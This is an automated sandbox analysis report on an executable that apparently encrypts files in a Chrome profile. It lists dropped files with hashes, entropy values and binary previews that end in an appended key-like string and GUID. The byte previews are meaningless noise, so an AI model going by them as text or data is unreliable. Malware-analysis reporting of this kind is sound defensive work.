C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	667
Entropy (8bit):	7.674052990054767
Encrypted:	false
SSDEEP:	12:PQvyLn44OviIYlvAnkZfM89Qwk2vc7KDzcTBnZbW8KStcii9a:POIvOaJ6kxBfk2eeQTBZPKsbD
MD5:	1C88A5A637F13C1C5EB13005037EEBCB
SHA1:	4902CF73A0BF0F59C325A91D348D5D9BF763E599
SHA-256:	26DB325F56E60D907D0CB764A4966D286C6EB5A7A16BF789951A3E138D6EC0C3
SHA-512:	582F07774D7BFA561BE64C93A575C51228FCB3AB60A52721D79758E7EFD84AD343633E893EC34D034A3CB5A72A9629F2FC97974B5125C0221B83F30BEE619D61
Malicious:	false
Preview:	2020/.......<(..........%.....;].>LX.,N.......v./.f..P..w....T...#.-..n.@l56...f..M.C....v..Z..=..J..J5.b..'...b...._7..A..d.z..!#h[9p.UYe#3&h..y&.......N..W....\.....^.....t.]......h.......?...D..k.".frK..u].......X.....W..1.=...K.4.N[.....o.....4>....y[7.es;!_....bn...A...I.d....LIR../......./....y...F.....o...Y............p._.M%.5...a.v.n.]x)........=...L.2~'.......m6.o..O...</.d.............87...H........5......{.p.x.....5..N..........gm......H.4.`P......R.W.s..O.(h...A.l]kc..=......Q]... ..!..{.g...N.l..f.lV...#.,.~........yj..0...$..!.']K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	769
Entropy (8bit):	7.697798423732244
Encrypted:	false
SSDEEP:	24:bK13IvscKBmRTjNvjNK29ZfpPhwJre/pJTp/bD:bK1RcKBMhvjYkh5z/pJT1D
MD5:	E34F5B56C6DEEA610347ED1816F667D8
SHA1:	542DF7E39A4D501123A5654297DF2D243170A3A7
SHA-256:	0CF0523FC019B5804F4A744C7087DFA9430FA72898DC10AA27A6B414D38E2CBC
SHA-512:	09047AF632D8F425CC55A457561FED9DE9D98BC1D8900AD75231ECE91E69DF464F0CCC24DE2223173E78737F34A030D8C3BA9A7BF5CC751F6B50EA548F30D9B3
Malicious:	false
Preview:	...#.?"..!."8.^..&..A,.X..y'@..............1X..>."..N....0..l)...?....QZ.&:P..&......Hh.w_!7......V.....3.eb0V.c>....M.....c.{..I,[......N...=R.M..Hx...;0........1...e.6.C....Wg~NK.......v...lb....?.y.<^..........=.#.0...D.j..+...E<d...M..[....d.x.IW.D...y..\|....E...x...i.....w..'..H....\gcW.W'}......e4v..b.I\|p..t......M- ..\.:-....o..^..^6x.S..m.I."..L.J......o..D.b...$...y...r...~@../V&...<...'.Vt.P..U.k..nR.G!.=.....Z....3...^.%.....~...U5.3.a;..n?..!.E.XD...a}......;...G.....n....Bs.\|.5...Oka[..Y.N}K....p.T...q.7...y]..qe...=..t..e`..y.....\|)$X..S...uf..k.`...W....%.O.....yF.D..:]U........a.wV.bl...e.zv&l..9....$..@U.5.......\|j=...jMY.MbK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	653
Entropy (8bit):	7.638873793462919
Encrypted:	false
SSDEEP:	12:bY3LJQIFCJ7LB4nuX8Ig3Om7mZinuLU+r4BUBP/TBPidEKtcii9a:ktjCJPOus57ugcLRB8bD
MD5:	3F9394F679ECFA767C6ADA465666E773
SHA1:	1FA448A8E3B9610582030691851CB8E3801A1161
SHA-256:	8DE591AEA32A3FD0DB36A55F7C974AFBCEB39A3CB393115F9B08054FFF9F58FE
SHA-512:	6B8710F4CE0F65792E9A5D8586B4B277BCA98D1DA7881C078EA3291B6C993B024ED0616B3B3C87920A7E4EFFD28FF981721C5079FBE99ECDDFC8A028FD1E2D07
Malicious:	false
Preview:	2020/e..BUP4.>....P....5h.#[....d..@h...P.]./..D..5...r^..Iz.2.%. ).......V.fsK.p...?......N-..g.T...?4s...oO}.&-...@......\|.3...P.!....../l.....E?.R.+.9.....!...!.{y2".(^.X.#.d[E.Q.].:..B..&.x...^..k.......e.}.]N....I.....u6d.P.V.CU.O.]...v.m.b......<+..i..<....X...q...~.E.....k...G..c.2...Hv..d....Gy..c.T?.[6.5..!..Arx..+.,.}.`......&......j.....\....i`.b,.{...n....Y..u.].I.T.Fj..v.%...g.. ....F..=......Ke...@.0s8s.N....A.h%.).K......C2.:.[.+.....q...yw..#A..._....V.(.2.n.K..&..3MW..4..c3....A.N..nW.\..Z..f....c..N....\ZxGT....t..........K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	374
Entropy (8bit):	7.396614774215386
Encrypted:	false
SSDEEP:	6:9Zzk3waD0GZx5zoAlEhza+Pgjao6MozxMvqzGLEsf4gCWe0grqbRAliGxntHciik:9ZIfD0GZLiv4TukqzGLggC107ADtciik
MD5:	C8C19ADAF44C9A870BC9A702ECF7A598
SHA1:	931F03138C765063E2BA953BCB660042925BFADC
SHA-256:	7C822056DC7E2F30336CE08C33CE7DB971DC491906DDD427748B19BA2893DABC
SHA-512:	F84024A02694825EC7A125C1F95EA7AD334933FAC7972148E02BE855E33747FFFF1D475C974C4313C0B6BE162B4AC1323ED715E03ECE2A7756524E60FF36D56F
Malicious:	false
Preview:	.On.!..aS......+..KF..3..W..PH.....A.*..=.......i0d..._.o.......{.m....OM..Z......P.....0......h...O.d...7'..;...\h.....,".PL..........Qv}..v_.1lO....%.....Y.\|.!.. .........3..]....m...>^...=.Sn.:<.....q......0..S.yq.{#o0.[N....-.._"...7..Y....?h......L.~Nw..Vj..J....q............q)K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	9100
Entropy (8bit):	7.978760662505691
Encrypted:	false
SSDEEP:	192:ldUf+3OeC43EkGeC3PCgpxfTzZMZncDV29tOkvQctSgfRh0RqeL3s:fbv3tLmPCuxeGQ9vQctSU0Rb3s
MD5:	BEE09D2C0576FF772EB3F8DDA2BE7F79
SHA1:	CF6D7BC6645E5188E9450BE879AC600045D23156
SHA-256:	238DB7F954832886CB2DA1732BC0F9EE326967B48D501853E79EC3D186834475
SHA-512:	0673CE214D58599C158B859653C00F6C97656F344CD08DA45006D75284AD4ED2699AA8F936369E2E0BD01B0F395B8A2D04372E7222D42A51CA1E7EDF01E2261C
Malicious:	false
Preview:	...n'.[W.Ee.NM..C......W<.m..z.5...Z...nW.U.Q}..K.#K....R;..=..l.%z...3......=q..[.x>)@.?4....4.@KSA./.)......7.uO...1.m`.1R...Y....=H.....4...G..aV.._.d.....X....t.P....b.y....a."h..sE.HhSr.(...e.`...H.90..4....\...e.(abN9.Vm....9.j..........._Y...;K..1.,...E....Qh.JP..I......po........<-..3..+...W..i.......'H....s.;V4....;X..7vzar.a..]..$.q...@a...Oj...............L.@....U.R..3b/'.n..Ue....e.p....=0.X,b.A.........z....4\'......y.,....IZP.06.e.....Z...Z=...N9.uuB..Mb ,.....!WX.s........f._..1.\....U....`T.......<..a.......z.d.F...-..)..]../.-K.,...=Li...xv.......J5..$...S['.?....... .2..J..0.sP.C...%6'.w<.~..>.......].%.(.....\....z.Z......@.}...I..@.....NB.....#.e......$..u.p..Za.3..w...k....E...HKy..-^.......8'Se......pM.Yr\|y.(.....tj......kT....!'T"...JW....'..Pi..Q.I.f....6..q-k..).....D7...k.k.g^X..9.w.b$xE9..fFH.q3L.PY5.a....j.p.9.....T.\|5N....9f.@g..X..q.._.M^..+;....\..%..r..=ga...@....0.........l./%?.4.)uk....t.p.....W:..*

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	660
Entropy (8bit):	7.649127992846428
Encrypted:	false
SSDEEP:	12:1pe9LdO7bwSyBM9gX0bMDcFd/Twa2XcVgtWrPy9kQj1CSnxt7dtcii9a:zo8FNY0bzFVNy9t0WLj1VtrbD
MD5:	1078CFFE322A5F483EF2BC4949198A45
SHA1:	C7E346949ED582BC6F85570F1D40F5E6EDBF58C7
SHA-256:	FE62732702AC3E1AB321AB394F75DCC99E6C61104298652E400D5F31A8458E2C
SHA-512:	07653149E57ECF4596449C0654198B412AA525487319C38601DE4369DCF23AC57990E1B7A54EB5C21E86E8BBC12026559C39D48BBDBE5C14D93B0E50CD8C490A
Malicious:	false
Preview:	2020/..-]..1...n..f=i...&....2.. ..).........R<GJ..M...0.....^..Q...g.?u.{>c...m.C.n.a_.z....m[!..).5.Y.m./..6.....Es".R?C.{$.C9..x.....)MA(.i.).g.._V..)...b."...30p..EzI.....iG..:..3...."Yq......G.j.x.Kd.!G.....c.$.d...c...8...3(.D`..n..-....^.....".r.......=?..a.4..Cox....H.`.hc%.`...+...6.h..\|..f.......-%A...P\|.....xr.\,........-1..;...40E...l3M.^.<.3..D..._O.P.".}-.X..._.4..?K.l:%[.J.\..p........\|5....).1O=/........b..S...K.............p...>..U..BEg..ve...<.f.....>=.m....Qh:.......c...(..K..a..@6.B.9V+&..h..B.#......Jo...C...Ws.[.........g.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8296
Entropy (8bit):	7.978450396782321
Encrypted:	false
SSDEEP:	192:9Z3Ey6dvKDeck+HpaYNenBeC+jj8Rnjy97fExX4xCi+La9p:zzeSskeBeNH8Itfw4Ei+cp
MD5:	5CDB1CE4644F150FB732C6E740F8A88C
SHA1:	949CBC452066C1C0050F6B7512B021E77ABD39AB
SHA-256:	071D986F16B321D2C5BD9675014FA2D69BE2B1A1A2062C556E39093953E7FC48
SHA-512:	731BE0B952D2FCD8D14175937E09760251D819F33DAC54E483DD3C0C2BCDAFA5E250E8EF9CEFEDB92835DA5C7A7A3B05DD995A669560E50E80B9547A66E1B453
Malicious:	false
Preview:	.PNG........_..J.k.U.......P`t...[....Q....P.m....\w....?....zv.</G...D...}.HW.W....@._.!E.......SJ.Zv....(.'=n.......:3..J..g....c...6~.K.l.u.4..\|.j...>.E1......4E.FE.T.#...g.'(.eP:Z6...m...>...A.....}..v.xLCCB.5..Rq.V[..o.."=.......c.'....18@..D......-..~..hpT.>s.fU.."..v..\....lW..U...`.v.......(\|..i...l.FlEI.....7}.'....g.O.%W!0].......n.L..E..s.....f...K`]....C...oD......(......Wi........#...z..qo..'.uS....5do.^q..s.....jp....R....F....c...98...}[{..b..n......w..K..............._...v...}.[.O^./5#.[U.......5~\.K.I^.q.5m.[#..9.D.3o.R.b.&T.._......b.....dh..S.!Z.d...(.R.).5M..\./?....A.Y..r~h........h.2.8......a!`]?6.]h.Y......bDRF..f..XV..v.t.7...dH.c.....S'.\l.....+.>.......q.........{....M.....h.."...3c..bt.i..\|.....d(MY..G..\|.....S......y#.x.......0Bp.Ia...R..(..&m.e...=C...}z\|...(....3z;......Y.B.!.`.\4.:O.f.$S.C%,..uW}...7.Hw...C0N..sk:../...Pq....z.....'.......Y6\,8..9..wAZ"~..(....!.....T..K.T.*..g..6....K.q..WT'A..........8]..p

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6023
Entropy (8bit):	7.972857180537423
Encrypted:	false
SSDEEP:	96:5KquxkBkMBMlbVkHJtw2NNhkBRjW18Dci3v/U4+pT2SxRMHM3E3c14vo3JztO8y:5buyBkfkhNNeoyncT2SDuM0s1HJztO3
MD5:	0E23B318DFE7EB2FB7BD908B34BF1DFA
SHA1:	5567653AF56A118ACE91693E5D57CC04B27D5F2C
SHA-256:	D59BCE2C217BFEE2025ED724287643A1A50C72DA7D9CD7A65166CF938B42D8C1
SHA-512:	7571463FA5F34AEF0947C6C628818798C276A59F9A1DF5828EACD47CAB2024549D3B683815B220F342ADD7D2B69C8A618DE4B7E594F28E8A286CEE09FECB05F6
Malicious:	false
Preview:	.PNG.x.y.....(..(...a...Q..t2...}.H..K..,H..#.H...}......%..:.Z.R.H^.g...1.......r\|..".....wu....p.)....R.H ....M..?.L...D<$.._ZP.!...(..4}..$3.$.$?..C.rZ..+..b..t.+..;w..T/R%.]...`...C.5..B.I.I...8X,.`..vA...H.~d......S.j.t..GH....N..'..c........K...?!t.B..r...Q.......`V%o......Ee....U.....n...M!8..,gcFntY=...%....u(..i....-/...,w..o.$d.\l...{.. ....N.....q............\|...D.h.1.Y.J.nT.............o.....mq...........F....$.'.`.1..Z... ].8.{....j..4u/.n......o.i......\|...2....{&.n.J..\l.A..5A.X.`F2m..vP.\|aRd.......2CJ.V...%oJ4.i..&P)]7.9.Y.;.{..i..NN.L.f..n-.5<)..k.sUzk...o../zb.Y.S..,".7..'8)F.......9...:S.~...:.'...o{36.....UeE,...\|.p.Q......zl.?.M.Z..mU"..t#B"...\.2.....R.........;...f...]tM`...hV~.j.3_-......M...^.l...n...J../._........F........c.....@.MN..E.x.N5....5....~..o#..U....nZ....Z..gB.@...$.....^...[......r..\|.".../3.y..4r%..l .[...:.b.w.&..J....7...^w....I..oH..g2.g......b#...m.`fde........)..IyP.......?.e........I

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	19928
Entropy (8bit):	7.990946717067047
Encrypted:	true
SSDEEP:	384:YHCVYPMVU2f8ZCi5sfptG8iJlrW17KD5CHrbH0xx3b:YHoYPMmTceIDiPrW9+5CLz0/L
MD5:	76B0AECCA79009E4B27CECE4B44AB567
SHA1:	0C9ED9B16BD4E8686D090BF52546E8B41AACCBF2
SHA-256:	FB360917F19EAD9C4239C90A0768E9CCF331B450BD2A06EC82D6E63E8A79E851
SHA-512:	9CABB97542D2E6348E6218E4A3ED8EAEA252E710D9E7AECF51A2F8A78A859708029C6251344B0CAEBF671A77D4AD9698B81EDB986F52F1597E712ECF1C9844EE
Malicious:	true
Preview:	.PNG..w...6OC..1...J8..HA...vR.k_..=JA.......x+..s.~.]2..y?o^..?{,7.?.W`-.y....._.+...h.yi...\zQ.].3y..2F..K...-Q..h....%..aZ.%..K..l...S.^.Q..8..'.O.+X........_o.......:.I..N.zgG.r6W.....3^.B^...!...U.2^x'.....R.Br9M0#.dzp )...F[.o.Kq.,]...r.e^S..9./xL..R`.{!.....}....N"._-ug..H.T.......:w.cT...\.aV.}.k"...t.V....R...v...^.-Q.R...3u@3...l]....E,.s.....~.v.v...~".[#...O..M.!:.....}.<X.M..t.~.3.<a.b..x<5.T..+.nl......s.Y..i..y.(.MC2.0.?........_.lmj.:.P.K.Q.v....j....uh.B..._8.......?.%.!.0;.:.....a/(...xpK!....,..m.a.=8...T.B..(..........=......g.A...Aox&HtgU.W..e...T..k..Lp........S%....O?9.x.....s..T..^..Si~.Wn......b3.'8. ..\|`l`..7.@K..#.V.h....c....+Q..%\.......E...$_........pm..8.........EV0.e~.X.V.;.}<.._6v#, .h-.....T_......I.4.,.fs._V./.xn....TG..R.7.UY....<.b.~.D...{......~...<.Y..3..[.bQ.6....?....5~7. ..........=.G.k;s<u.......d.....i)I.;......q.T...N...s.l....C..FoO.....0t.9t.....g..%......v.cgY..}....=.r?....j.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2150
Entropy (8bit):	7.894838455997438
Encrypted:	false
SSDEEP:	48:gyzOkNT79cUjtZbSAug7ApNxpUrKGlC86yu82mnIOHkDQmD:gojj3SAug7KNxpU2W6uN+
MD5:	0368FC44052EBE5766887EDFE863921C
SHA1:	77A16CFEEF768A66D5F5EA8B1A2D8051BB71B1D7
SHA-256:	9E88388BFC6EA72A0EB4CEF2D7500C217F9D2ED4854C502497C800281922F398
SHA-512:	312EF3542B657361C4989C5BF354B45B1B358397BD311BB198389A04DD01E053328EAE987364C901E06A8DF0C6A381DB08FE83C95048409E2DC57E0647C70422
Malicious:	false
Preview:	.PNG....s......k.xm6Hty..b....O....'..It.?~H..~...k.SZ..n.-.A.....G..z.M.X.;.Z.c=....Bc[.%.R.u.D8.s.q$.zJ^".h`.....&]...y..<D..6...j..G..H.W......v.%..h...qK3.....h]yR.$F.k.}#..F_.BO:5.Mav.r.-.....&3GT..F%.S+Y...KM...b,hG..<~.E...\|..2l.>..px...P.....D.....\|........er....-..6.fg.~r.Hv.Z.....n:...e.q...$2.z.W .01...G...:`..ks...A..{.JF].T.?..0.Gk.....i\..F..6FE4u.........Nv...%...u..o.6.nH..6...t...I..k8h(...E+...L.&1..q......YA......PFQ.QM..i...jj.... .A.T.st.Z...E&..t..X`.Y.;.......p...N.%.k$.u.{}....7x...,GID8E}.o\....p....J.Z.0y.CN9.UW...,..j_=.hn..~.\|.F.a..^G.N:MP.3U...;v.o.7.D.r.H7.Y.S.......<...f.Tg...;...>...C.....i..8n\|..-..\|..<.P.D...X...+S.....f.z..P.T#.{..W;....w.......`...-a......b......rf.>..0...:....xB....3~....C.1]....w>.......L..2("`.k..sE.w......8u......n{.9+.j....C.F.$P......Y^^.&..V.kH..e.....y-.....&%B.C:+...n..x.......<......n@pK.L.L........5...2U9.[N..:QA.....RI.s?.....[...]n...u.."]y@.P......^..&..L..`.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3201
Entropy (8bit):	7.937383274033901
Encrypted:	false
SSDEEP:	96:AHqMJ+TJ5NSuXhpJbVjA2L57G2Qkf34i0nICkuaJ:fFNxRH5jAa79NIi1
MD5:	0E9DB0540EC9F914C573E49C1D3D57B6
SHA1:	2F798EA473C15FC9C5E2DBBE771CB65A8E13D162
SHA-256:	143DCDA4CE752BF6B8DA0189A87265C9DB65B8690938C166916F4C47575247CC
SHA-512:	434EE983B9F0A2BD918FAD8BD11DF5EFCE297E91762011F52933BC3B3472E2277727BD9CF7CA123E755B64243D20D6281B30355298B608F2A75DA3E2FF8FD6CF
Malicious:	false
Preview:	.PNG.~..1....E.2(.....#.2j.....-.K..lV.%..X.(...E.a..?......D.x..S."H3..R....a.pS.!.Z^.......t..&..>.u.X....B..o.D@...g....j.'....la.p.d....Ih....@.T.\|.#..w..e...e>.e..5hd.v.i#..fi<V{!...q...9...+Kp&...]........g...[.&.e.$...2....NS........7.0.3[.qj.E...X.P..; ......T....5...g..u).,.M9N/V..J...}D.....A....a.m.)N.H.j.@:.^.....C......J..;`..1[hK>..:e.6.2.....]+...bk..F.e7%(...._.d_Z.F.....~..^E8.?....7%..`R..bv..$.0.P........{.R...[...Y.)Z.O. ?..?.'...kqP.7..).......#.].HT#.=S..O.0../............0..b..i.3.F>..:.....o..HB.G..U%.TFa%.$.m.w..YP`.+...S...K:.\|.r,.....r...U5.M.!@.Om...RA.4..m.4X..+....._l.........V.7...K.J6m....8Zn..:q...6..H..7.;#......+.w.....wxp~....t.2..y...GP$HaC3RS..r..!_.....0[.g..A.3...u.........:...J.0SI...bm..<_..A.....c...).4...(..M..ne,.....(.j.?...%.f....Bo........7...?.U..+...^mR..F.....h]...I.......GI}..^F.../.c..]..FK.u~.7.i).K~.*z..B...}oF./3...b.....8A]._...r......K.)v..u...G.#.,.W....$.Y.9f.B1B%..~S...X

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4170
Entropy (8bit):	7.956316605559718
Encrypted:	false
SSDEEP:	96:Ehc03GYR4fYRY9csjT57qlyQNPe8dbVSrZ6mWU:EbGEYCsvolyQNvdB66mt
MD5:	9735BC839F2401673CF7A2A685F842EE
SHA1:	069AA691CD58F018D890AE15D4491B106846F170
SHA-256:	3F66D4999B26095E50327C47D83AE8F7AE8C82011414AEB11AD970E5F8ED876C
SHA-512:	4EECED280E93B26C9FF19F54DC6F43696F1901497CF527D6917CFAF102D47EEBA79C7E1684109B526958BAA79673F10CF46EA48C69372CA5E0531D38A27053AE
Malicious:	false
Preview:	.PNG.......3.JC..t.Y.....x.-..J..[=.I..D.+S.. ..'\,H%.......J..i 1X......p......+.......8[Vc..N..7_..<......[.h.G..x.a........._O..g.....7,...mn....-..K....Y..N..K..YmuZ.%E)...T.I...Z.(aG..F..=...}....G.+.z...8s"=.c....e.......E....."1...!.nu.0..l..sU....n8.f...&...eW.....o.. 6Mc..m...d.e...<..-...R...3..Y....1.....v64m..}..@..N...'..@.YR.%...P.2?....MT.@\....!.[v..m..t..J.#C...0j..&.C.....Q.^......w.. ........t.K..r.i....H@i..y>cl\}d.=.=.f.1v[.....a..s?..I..<?..m..;.&>.I...p...+mV...._...l?..:..Yk....Z".t.v..r...Aw..9P...j.G.{@...]..).J}O./.^MjfK9.CR..\l......t..PY.......L..#.. &\|;..N...@....v.........n..p..Y.XuZ\|.1..8].....&...).._..eK.Ev..ZGP...7.!B..D3XO.E&...(e.....bb.._E.....8..o.7..A.H.S..}..aDrSA........PFZ....cY..c.#r._..E.H,K...&.Q..6........-.......>..M.a%.Nt.,..!.I...2..C...2....q.....4..H......n....aH..........A..;l..>.....K...W.B .zv.^.V..@m5...?..SNk..L....1.,.rr.j"..Bs/..R.e..y.(J.v.3.ZY...w[$y..?DP.K...,..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\96.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6103
Entropy (8bit):	7.972218538034077
Encrypted:	false
SSDEEP:	96:z69egiySOjzOo4xYbqf+AISYT1dqNjvtPvszXHH9WjpQDOUP6ivEvsA4ibJcRkCT:W9NxSwzOo46G2AIVHYvtPv4nUjCDOUym
MD5:	7F6A14C1DC76DB709D26FF225487A0CE
SHA1:	A1DF7067495572CFFBA4E173DBFF4042A0B279A0
SHA-256:	CEE50B5D8E6F0134B4497B55944BD878800C6BCCE22B67194A5F5F97217F0030
SHA-512:	37D164D542C62BD809D97CB14D80AD09ACA6DB8EEFA60472CC2B3E03735E6BA77D62195CC719C6AB44D53E8972C4D10ED0A57C9ECF20151D94ABE9C2D62CA8A9
Malicious:	false
Preview:	.PNG....gq0.(Bp:h.]...;..A..y4...V..1.8`..q.iWu.S,..c.b..xO..d.wO,......z..."........X^..g[.{.q.S_.Xru....3M.\]8.>.OP.=4...g....s....t..9..wH..DU.bf.....@.l..0..Z?h.l...I..Z..........9..43q...o.9....Z..3`.......x.+\|O..k..[k..^.A...aGAQOm.....e.q:.fXC....h....]..x..$.pF3......_Y..n.e.8..3..j.[......m......I.i$....(...#.e...m..6.....KO...)...Br.2.7...Fy.....h..F3.V.=......Y..UM,t..tT.w......B.._O..+...5..%.O\|.t.?e......f..V.............H.}<.....Cf...Q......%.ZIC.) ..@.rj.]E......,..Dy3L7.......nF..6.@...v{.m.?.I.D@dp..jH#o.y.=.......>M.......X.F.P.....cY..!.!t(\|.JX......>=.#..T.......... Y.~.-9P.7..5A..3... {.'.c.....Dw.x6..;....h..MeK.X9/wG...':.up..\|.\...h.p.....3..v ..r.[...OjA.H...Z./....W..6C_......Q>.V....K....a...8...Jc..[.....0....W..3..U. ....C...hH........]..d\|C.=..F..........#2..(.u.#..l..$.t.t<.. ..1..].v.+j..\.$.7.P.<..O.......e0..u0{.vf.$...J.=.........Gm...*;g..V....a.&..7;.o.b CP+....^.>Y=.+.%.U..o....E.T.._`.."

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\128.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	10398
Entropy (8bit):	7.981961379286768
Encrypted:	false
SSDEEP:	192:ONk2KJ7iy+9rI266cVt0cE68a/tqvMj7uWywkYxbbXMH2GmrrHeGk:iM7U0266M58iHkcX9H6
MD5:	6EF88F1B510917DFBBBC8D902BA3C80B
SHA1:	63093781DAAF91D41483A984839BDCE12BB5F764
SHA-256:	9A247E335C18D9ECB437C51ACA2A78ED74851642D067A6BE3602AF9116A8FC6D
SHA-512:	2875E21AE33455F2BF2B062ADB639C28D9FC875AED0D7A23807B4B5214FF4A7BF6199F45CEDCBE1F08FC2D1E7B3FF0EEA13827BCCA9CB78B79C0F86294021E87
Malicious:	false
Preview:	.PNG.T]...u.W..$.:.......m..;.q..h............b..p'.n..o.<..]{....9..}\..3[......R5.F.....O.fWdR.......:j$....2..-@..,zTP.Hs........O.E:.Wz..eT....8.....j....%...h\|..xg..&./...<N.L.=....4=.:s......d.b..w.3.w......{/.1.+5..'.h.B[..PJ...........\|...2z;d..6Q.&......#zz.E...8.....#).N..v..w..;nB.m.......B.w.w..8....T....._I...B....~.....+.....t.-...\|hr.k...n'hS.T.U0.br(.N....ZQ..IO.%...w....O......`....y...\N..Sa......h../.Qbv....:f...^.,%I1k..,......4\.[{.....h!i0.h..x.)....D..[W(6^X.n...>.7....H.um_..&<6).Z._.3.....-.2...M.la.......K..L.T.k."J..OZQi<f.P..s...".hx...".+..Z...Q.}#....2.{.[H......{..B.2D.:..."...6\7%Yn";X.....q`3e.2....W../../..?.'..r1='......4...+..!.?...........l...d.e.......8Z..........F..t...._u......>xn\.(d..g.....+.q.2@ .c.6.R..E... ...Y.....CG.....Y..7!.b8.....e..k%}@T..#...h...U..._._...#....]^..(..w1....Xd.>.3o5].".......-F.sQ......r!.PT/...8.B..Z......y%..U...tz......N5..6..\l.=.\^~.Q......>..9....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\192.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7289
Entropy (8bit):	7.976007936767282
Encrypted:	false
SSDEEP:	192:TncOpjJ34U4gqMCbTQy5rcDvfnwEA4fodE/NbEpOQMAMBIdMI:TnJLrbkbT1xaouoqNgF8Wd5
MD5:	F076A3B2F42CBEA6F27DBACDF7422778
SHA1:	657A8A22FC3FF100F9E9CD2FF8DC854847FFEC34
SHA-256:	F690CB7A8CB07948F2939F7B25820EE585B6ECD599FEFED3F301884578E9B952
SHA-512:	69FB4EF7B08D2361BAE352D29CC023F491741ACB9ECF4189152EA2490C69BDEB47902654CF051E2F3CD8EF61F784ACC87ADF1DFEC51B9A41B0568D212B57DB04
Malicious:	false
Preview:	.PNG....eK0.;f[..o..Q.5-#k.......R0...IPk..f.e...Ub.@f.\|a.UN.Df...C...Wd...K... sD.)I.....<.8..><,.&Fu...h.b..B.:.......$.[fl.....05L-.g3..\8..ZTGJ..(.Z.G.k...uQ._i....G.".#G.7..v{.2...>...t.Cv....T...+..$.....2..Y..6..........s>...jN.......3.m...R.'..Y[.c...l.F..d...OWA...I...6-.f.x.K.....w........E..&w"Y.....e~.pO...GI.-...X....<.=.RG.M...2wS.7>.h.lp...@li...5.y'..6.e..k....{R.+!j.Q....<V...x......0.z'..7..!L...".......KT....Y..i.Q.4Ew.~V.%T......O....ls...M:.,..]e0..7... U.}.......C'..F?O......>.Z....R.).SVp..........-......j...K!F. ._.1?.y..gV[Jk.p..j8_Q...$.......a...nJ.,5.T!.N.........y...t?i.NZ.J.e.)Sj...y(....M.XB.... S.QI1.o#-"=..v.W..5g2.-%.3.p,.j..........}M..u.....+....E. ..b..6r.....d...<.X...SL.."m..1d{pl.r..v..lO..rTj.hsK@C:`.}....w6...}....*k..E..v..RN.N..$...K.%..w....v..;^.....o..\./..]...>...W...?kAb..\....>.,.v5B..!........h>J.)..._.y......J..G#.r.ji. '...;]..~<.+m....3.,Et..Y...S..,...T.s...h[.\=$:..-.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png

Download File

